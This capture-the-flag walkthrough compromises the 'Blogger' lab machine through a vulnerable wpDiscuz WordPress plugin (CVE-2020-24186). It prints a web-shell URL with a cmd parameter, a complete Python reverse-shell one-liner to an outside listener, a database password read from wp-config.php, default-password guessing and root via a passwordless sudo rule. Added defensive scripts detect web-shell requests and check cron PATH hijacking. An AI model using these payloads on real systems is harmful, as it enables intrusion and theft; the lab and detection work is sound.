In this walkthrough we go through the Blogger room from Proving Grounds. It is rated Easy on the platform. Initial access comes from enumerating and exploiting a WordPress plugin; privilege escalation needs some password guessing and the abuse of a misconfigured sudo rule to get root on the server. So, let's get started without any delay.
Machine Info:

| Field | Value |
|---|---|
| Title | Blogger |
| IP address | 192.168.224.217 |
| Difficulty | Easy |
| OS | Linux |
| Description | Blogger is an easy machine which requires WordPress Plugins Enumeration and exploitation to get initial access and then with the help of some password guessing and misconfigured sudo permissions get root on the server. |
Enumeration:
- I started with a regular nmap SYN scan with service version detection enabled (-sS -sV) and found two open ports: 22 (SSH, OpenSSH 7.2p2) and 80 (HTTP, Apache 2.4.18). Port 53 showed as filtered. Both banners are consistent with an Ubuntu 16.04 host.
```
$ sudo nmap -sS -sV 192.168.224.217
Starting Nmap 7.80 ( https://nmap.org ) at 2024-01-11 13:36 IST
Nmap scan report for 192.168.224.217
Host is up (0.21s latency).
Not shown: 997 closed ports
PORT   STATE    SERVICE VERSION
22/tcp open     ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
53/tcp filtered domain
80/tcp open     http    Apache httpd 2.4.18 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.61 seconds
```
Enumerating Port 80 (HTTP)
- Browsing the web server on port 80 showed a static portfolio website.
- The site's menu has a login button. I registered as a user, but could not find any way to log in any further.
- Next, I ran gobuster against the target to find hidden directories. It found a few; the interesting one was /assets.
```
$ gobuster dir -u http://192.168.224.217/ -w ~/Desktop/Wordlist/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.224.217/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2024/01/11 13:47:49 Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 319] [--> http://192.168.224.217/images/]
/js                   (Status: 301) [Size: 315] [--> http://192.168.224.217/js/]
/css                  (Status: 301) [Size: 316] [--> http://192.168.224.217/css/]
/assets               (Status: 301) [Size: 319] [--> http://192.168.224.217/assets/]
/server-status        (Status: 403) [Size: 280]
===============================================================
2024/01/11 13:54:45 Finished
```
- Browsing /assets further revealed a "blog" sub-directory under /assets/fonts/, i.e. /assets/fonts/blog/.
- The blog's post links redirect to the hostname blogger.thm, so I mapped that name to 192.168.224.217 in my /etc/hosts file and loaded the site. The blog turned out to be running the WordPress CMS.
Enumerating WordPress CMS
- Moving on, I used wpscan to enumerate the WordPress installation further, initially looking for all plugins (ap), all themes (at) and the available users (u).
```
$ wpscan --url http://blogger.thm/assets/fonts/blog/ -e ap,at,u
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.25
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://blogger.thm/assets/fonts/blog/ [192.168.224.217]
[+] Started: Thu Jan 11 14:21:42 2024

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://blogger.thm/assets/fonts/blog/xmlrpc.php
 | Found By: Link Tag (Passive Detection)
 | Confidence: 100%
 | Confirmed By: Direct Access (Aggressive Detection), 100% confidence
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://blogger.thm/assets/fonts/blog/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://blogger.thm/assets/fonts/blog/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://blogger.thm/assets/fonts/blog/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.9.8 identified (Insecure, released on 2018-08-02).
 | Found By: Rss Generator (Passive Detection)
 |  - http://blogger.thm/assets/fonts/blog/?feed=rss2, <generator>https://wordpress.org/?v=4.9.8</generator>
 |  - http://blogger.thm/assets/fonts/blog/?feed=comments-rss2, <generator>https://wordpress.org/?v=4.9.8</generator>

[+] WordPress theme in use: poseidon
 | Location: http://blogger.thm/assets/fonts/blog/wp-content/themes/poseidon/
 | Last Updated: 2022-10-20T00:00:00.000Z
 | Readme: http://blogger.thm/assets/fonts/blog/wp-content/themes/poseidon/readme.txt
 | [!] The version is out of date, the latest version is 2.3.9
 | Style URL: http://blogger.thm/assets/fonts/blog/wp-content/themes/poseidon/style.css?ver=2.1.1
 | Style Name: Poseidon
 | Style URI: https://themezee.com/themes/poseidon/
 | Description: Poseidon is an elegant designed WordPress theme featuring a splendid fullscreen image slideshow. The...
 | Author: ThemeZee
 | Author URI: https://themezee.com
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 2.1.1 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://blogger.thm/assets/fonts/blog/wp-content/themes/poseidon/style.css?ver=2.1.1, Match: 'Version: 2.1.1'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating All Themes (via Passive and Aggressive Methods)
 Checking Known Locations - Time: 00:20:51 <==============================> (26636 / 26636) 100.00% Time: 00:20:51
[+] Checking Theme Versions (via Passive and Aggressive Methods)

[i] Theme(s) Identified:

[+] poseidon
 | Location: http://blogger.thm/assets/fonts/blog/wp-content/themes/poseidon/
 | Last Updated: 2022-10-20T00:00:00.000Z
 | Readme: http://blogger.thm/assets/fonts/blog/wp-content/themes/poseidon/readme.txt
 | [!] The version is out of date, the latest version is 2.3.9
 | Style URL: http://blogger.thm/assets/fonts/blog/wp-content/themes/poseidon/style.css
 | Style Name: Poseidon
 | Style URI: https://themezee.com/themes/poseidon/
 | Description: Poseidon is an elegant designed WordPress theme featuring a splendid fullscreen image slideshow. The...
 | Author: ThemeZee
 | Author URI: https://themezee.com
 |
 | Found By: Urls In Homepage (Passive Detection)
 | Confirmed By: Known Locations (Aggressive Detection)
 |  - http://blogger.thm/assets/fonts/blog/wp-content/themes/poseidon/, status: 500
 |
 | Version: 2.1.1 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://blogger.thm/assets/fonts/blog/wp-content/themes/poseidon/style.css, Match: 'Version: 2.1.1'

[+] twentyfifteen
 | Location: http://blogger.thm/assets/fonts/blog/wp-content/themes/twentyfifteen/
 | Last Updated: 2023-11-07T00:00:00.000Z
 | Readme: http://blogger.thm/assets/fonts/blog/wp-content/themes/twentyfifteen/readme.txt
 | [!] The version is out of date, the latest version is 3.6
 | Style URL: http://blogger.thm/assets/fonts/blog/wp-content/themes/twentyfifteen/style.css
 | Style Name: Twenty Fifteen
 | Style URI: https://wordpress.org/themes/twentyfifteen/
 | Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's simple, st...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://blogger.thm/assets/fonts/blog/wp-content/themes/twentyfifteen/, status: 500
 |
 | Version: 2.0 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://blogger.thm/assets/fonts/blog/wp-content/themes/twentyfifteen/style.css, Match: 'Version: 2.0'

[+] twentyseventeen
 | Location: http://blogger.thm/assets/fonts/blog/wp-content/themes/twentyseventeen/
 | Last Updated: 2023-11-07T00:00:00.000Z
 | Readme: http://blogger.thm/assets/fonts/blog/wp-content/themes/twentyseventeen/README.txt
 | [!] The version is out of date, the latest version is 3.4
 | Style URL: http://blogger.thm/assets/fonts/blog/wp-content/themes/twentyseventeen/style.css
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://blogger.thm/assets/fonts/blog/wp-content/themes/twentyseventeen/, status: 500
 |
 | Version: 1.7 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://blogger.thm/assets/fonts/blog/wp-content/themes/twentyseventeen/style.css, Match: 'Version: 1.7'

[+] twentysixteen
 | Location: http://blogger.thm/assets/fonts/blog/wp-content/themes/twentysixteen/
 | Last Updated: 2023-11-07T00:00:00.000Z
 | Readme: http://blogger.thm/assets/fonts/blog/wp-content/themes/twentysixteen/readme.txt
 | [!] The version is out of date, the latest version is 3.1
 | Style URL: http://blogger.thm/assets/fonts/blog/wp-content/themes/twentysixteen/style.css
 | Style Name: Twenty Sixteen
 | Style URI: https://wordpress.org/themes/twentysixteen/
 | Description: Twenty Sixteen is a modernized take on an ever-popular WordPress layout — the horizontal masthead ...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://blogger.thm/assets/fonts/blog/wp-content/themes/twentysixteen/, status: 500
 |
 | Version: 1.5 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://blogger.thm/assets/fonts/blog/wp-content/themes/twentysixteen/style.css, Match: 'Version: 1.5'

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:01 <==============================> (10 / 10) 100.00% Time: 00:00:01

[i] User(s) Identified:

[+] j@m3s
 | Found By: Author Posts - Display Name (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] jm3s
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Thu Jan 11 14:42:55 2024
[+] Requests Done: 26708
[+] Cached Requests: 14
[+] Data Sent: 7.691 MB
[+] Data Received: 4.265 MB
[+] Memory used: 323.953 MB
[+] Elapsed time: 00:21:12
```
- The scan gave plenty of information, but nothing I could turn into initial access: I found no known exploits that applied, and brute-forcing the WordPress admin login with the discovered usernames (j@m3s, jm3s) and a common-password wordlist got nowhere. Note that plugin enumeration above ran in passive mode only, which relies on plugin references appearing in the page HTML, so I re-enumerated the plugins aggressively; aggressive mode requests known plugin paths directly and finds plugins the pages never reference.
wpscan --url http://blogger.thm/assets/fonts/blog/ --plugins-detection aggressive -e ap
Initial Access:
- Aggressive detection found two more plugins: wpDiscuz and akismet. Checking both for known issues turned up an unauthenticated arbitrary file upload in wpDiscuz (CVE-2020-24186, affecting wpDiscuz 7.0.0 through 7.0.4) that escalates to remote code execution, since the uploaded file is a PHP script served straight from the uploads directory.
- I ran the public exploit below (49967.py; -p points at a blog post, here post id 29), but it did not give me a shell. According to its output the web shell was uploaded successfully, but the script then failed to execute it.
python3 49967.py -u http://blogger.thm/assets/fonts/blog/ -p /?p=29
- I looked in the uploads directory where the shell had been stored (the directory listing on wp-content/uploads/ that wpscan flagged earlier makes the generated file name easy to find) and appended the "?cmd" parameter manually, as the exploit does. The response then contained the output of whatever command I supplied.
http://blogger.thm/assets/fonts/blog/wp-content/uploads/2024/01/djnxvscwscmaadr-1705075469.8528.php?cmd=whoami
- To upgrade from the web shell to an interactive shell, I ran the Python reverse shell payload below through the cmd parameter (it has to be URL-encoded when passed as a query string) and caught the connection with a netcat listener on 192.168.45.221:1234.
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.45.221",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
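The chain above (an upload through the plugin, then a PHP file executed from wp-content/uploads/ with a cmd parameter) leaves a distinctive trail in the web server's access log. The following is an added example, not part of the original walkthrough or of the 49967 exploit, of how a defender would hunt for it: it parses Apache combined-format log lines, flags any .php requested under wp-content/uploads/, flags a web-shell-style command parameter on such a request, and correlates it with an earlier POST to wp-admin/admin-ajax.php from the same client. The use of admin-ajax.php as the upload endpoint is an assumption here, as the page never shows the upload request. The log lines are constructed for the example; only the uploaded file name is taken from the page.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Apache "combined" format: client IP, timestamp, request line and status are all we need.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) '
)

# A PHP script (any common extension) living under the uploads tree should never be requested.
UPLOADS_PHP_RE = re.compile(r"/wp-content/uploads/.*\.(?:php\d?|phtml|phar)$", re.IGNORECASE)

# Query parameter names that minimal PHP web shells read their command from (heuristic list).
SHELL_PARAMS = {"cmd", "c", "exec", "command"}

# Constructed sample log: the .php name is the one the walkthrough shows, everything else is made up.
SAMPLE_LOG = """\
192.168.45.221 - - [12/Jan/2024:16:44:29 +0000] "GET /assets/fonts/blog/?p=29 HTTP/1.1" 200 51230 "-" "python-requests/2.31.0"
192.168.45.221 - - [12/Jan/2024:16:44:31 +0000] "POST /assets/fonts/blog/wp-admin/admin-ajax.php HTTP/1.1" 200 412 "-" "python-requests/2.31.0"
192.168.45.221 - - [12/Jan/2024:16:44:40 +0000] "GET /assets/fonts/blog/wp-content/uploads/2024/01/djnxvscwscmaadr-1705075469.8528.php?cmd=whoami HTTP/1.1" 200 9 "-" "Mozilla/5.0"
10.0.0.7 - - [12/Jan/2024:16:45:01 +0000] "GET /assets/fonts/blog/wp-content/uploads/2024/01/photo.jpg HTTP/1.1" 200 44021 "-" "Mozilla/5.0"
10.0.0.7 - - [12/Jan/2024:16:45:03 +0000] "GET /assets/fonts/blog/wp-content/uploads/ HTTP/1.1" 200 1800 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Split one access-log line into ip, method, decoded path, query parameter names and status."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = unquote(parts.path)  # decode %2e-style encoding so the .php check cannot be dodged
    rec["params"] = {k.lower() for k in parse_qs(parts.query, keep_blank_values=True)}
    return rec


def detect(log_text):
    """Return one finding per suspicious request: a PHP file under uploads, upgraded to a
    web-shell finding when it carries a command parameter, and tagged when the same client
    POSTed to admin-ajax.php earlier in the log (upload followed by execution)."""
    findings = []
    ajax_posters = set()  # clients seen hitting the AJAX upload endpoint so far
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ip, path = rec["ip"], rec["path"]
        if rec["method"] == "POST" and path.endswith("/wp-admin/admin-ajax.php"):
            ajax_posters.add(ip)
            continue
        if not UPLOADS_PHP_RE.search(path):
            continue
        rule = "webshell_command" if rec["params"] & SHELL_PARAMS else "php_under_uploads"
        if ip in ajax_posters:
            rule += "+after_admin_ajax_post"
        findings.append({"ip": ip, "rule": rule, "path": path, "status": rec["status"]})
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_LOG):
        print(f"{f['ip']} {f['rule']} {f['path']} (HTTP {f['status']})")
```

On the sample log the only hit is the attacker's GET of the uploaded .php with cmd=whoami, tagged with the preceding admin-ajax.php POST from the same address; the innocent image download and the directory listing from the other client are ignored. The underlying fix is the same thing the detection keys on: the web server should refuse to execute anything under wp-content/uploads/, and directory listing there should be off.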
- Reading wp-config.php gave me the MySQL credentials. I enumerated further with them but found nothing interesting.
cat wp-config.php
root: sup3r_s3cr3t
- Captured the local.txt flag in james's home directory.
Privilege Escalation:
- Next, I uploaded and ran LinPEAS on the target. It revealed a cron job that is executed by root.
- Looking closer at the script it runs, /usr/local/bin/backup.sh: the file is not writable by our user, and it writes a backup into james's home directory. Since the script calls tar without an absolute path I tried a PATH hijacking attack on the tar binary, but it failed. That is expected unless the cron job's PATH contains a directory we can write to: cron does not inherit our shell's PATH, it uses the PATH= line from the crontab (or /usr/bin:/bin if none is set).
ls -l /usr/local/bin/backup.sh
cat /usr/local/bin/backup.sh
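To make the failed PATH hijack concrete: a bare tar in a root cron job is only hijackable if one of the directories in the cron PATH is writable by the attacker and is searched before the directory holding the real tar. The script below is an added example, not code from the walkthrough: it pulls the PATH out of a crontab (falling back to cron's built-in /usr/bin:/bin), lists the commands a script invokes by bare name, and reports which PATH entries an attacker could plant a fake binary in. The crontab and backup.sh texts are constructed stand-ins (the page never prints the real backup.sh), the hardened PATH is the stock Ubuntu /etc/crontab value, and /tmp in the weak crontab is a hypothetical misconfiguration added to show the contrast.

```python
import re
import shlex

# PATH cron gives a job when its crontab sets none (Vixie/ISC cron built-in default).
CRON_DEFAULT_PATH = "/usr/bin:/bin"

# Words the shell handles itself, so PATH lookup never happens for them.
SHELL_BUILTINS = {"cd", "echo", "export", "exit", "set", "if", "then", "else", "fi",
                  "for", "do", "done", "while", "test", "[", "return", "local",
                  "read", "shift", "true", "false", "source", ".", "eval"}

_SEP_RE = re.compile(r"\s*(?:;|&&|\|\||\||\n)\s*")      # simple-command separators
_ASSIGN_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*=")   # leading VAR=value prefix

# Constructed stand-ins for the target's /etc/crontab and backup.sh (not the real files).
HARDENED_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
* * * * * root /usr/local/bin/backup.sh
"""
WEAK_CRONTAB = """\
SHELL=/bin/sh
PATH=/tmp:/usr/local/bin:/usr/bin:/bin
* * * * * root /usr/local/bin/backup.sh
"""
BACKUP_SH = """\
#!/bin/bash
# constructed example: archive the blog into james's home directory
DEST=/home/james/backup.tar.gz
tar czf $DEST /var/www/html/assets/fonts/blog && chown james:james $DEST
"""


def cron_path(crontab_text):
    """PATH cron hands to jobs from this crontab (a plain NAME=value line, not shell syntax)."""
    for line in crontab_text.splitlines():
        m = re.match(r"\s*PATH\s*=\s*(.*)$", line)
        if m:
            value = m.group(1).strip().strip("\"'")
            return [d for d in value.split(":") if d]
    return CRON_DEFAULT_PATH.split(":")


def bare_commands(script_text):
    """Commands the script invokes by bare name (so they are resolved through PATH), in order."""
    found = []
    for raw in script_text.splitlines():
        line = raw.split("#", 1)[0]  # drop comments, including the shebang line
        for segment in _SEP_RE.split(line):
            try:
                words = shlex.split(segment)
            except ValueError:  # unbalanced quotes: skip this fragment
                continue
            while words and _ASSIGN_RE.match(words[0]):  # strip VAR=value prefixes
                words.pop(0)
            if not words:
                continue
            cmd = words[0]
            if "/" in cmd or cmd in SHELL_BUILTINS:  # explicit path or builtin: PATH not consulted
                continue
            if cmd not in found:
                found.append(cmd)
    return found


def hijack_points(crontab_text, script_text, writable_dirs, real_dirs=None):
    """For each bare command, the PATH directories (in search order) where an attacker who can
    write to `writable_dirs` could plant a fake binary that cron would run instead of the real one.
    If `real_dirs` maps a command to the directory holding the genuine binary, only writable
    directories searched before that one count. An empty list means PATH hijacking cannot work."""
    path = cron_path(crontab_text)
    writable = set(writable_dirs)
    real_dirs = real_dirs or {}
    result = {}
    for cmd in bare_commands(script_text):
        candidates = [d for d in path if d in writable]
        if cmd in real_dirs and real_dirs[cmd] in path:
            cutoff = path.index(real_dirs[cmd])
            candidates = [d for d in candidates if path.index(d) < cutoff]
        result[cmd] = candidates
    return result


if __name__ == "__main__":
    print("hardened:", hijack_points(HARDENED_CRONTAB, BACKUP_SH, ["/tmp"]))
    print("weak:    ", hijack_points(WEAK_CRONTAB, BACKUP_SH, ["/tmp"], {"tar": "/bin", "chown": "/bin"}))
```

With the stock Ubuntu crontab PATH none of the six directories is writable by the web user, so both tar and chown come back with no hijack point, which is exactly why the attempt on this box fails; the same script against the weak crontab reports /tmp for both, because it is searched before /bin. Protecting the job is therefore a matter of keeping writable directories out of the cron PATH (or using absolute paths in the script), not of the script's own permissions.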
- After a lot of head-banging, I found that we can switch to the user vagrant with the password "vagrant" (the default credential of Vagrant base boxes). This was purely guesswork and requires no special enumeration.
su vagrant
Password: vagrant
- Checking the sudo permissions for this user showed that vagrant can run any command as root without a password, i.e. a sudoers entry of the form (ALL) NOPASSWD: ALL.
sudo -l
- With that permission, I switched to root and captured the root flag.
sudo su
Conclusion:
So that was "Blogger" for you. We started with a regular nmap scan and found two open ports, 22 (SSH) and 80 (HTTP). The web server turned out to host a WordPress installation under /assets/fonts/blog/, and aggressive plugin enumeration showed that its wpDiscuz plugin was vulnerable to unauthenticated file upload leading to RCE (CVE-2020-24186), which gave us initial access. Password guessing then let us switch to the vagrant user with the password "vagrant", and that user's unrestricted, passwordless sudo rule gave us root. On that note, I will take your leave and meet you in the next one. Till then, "Happy hacking".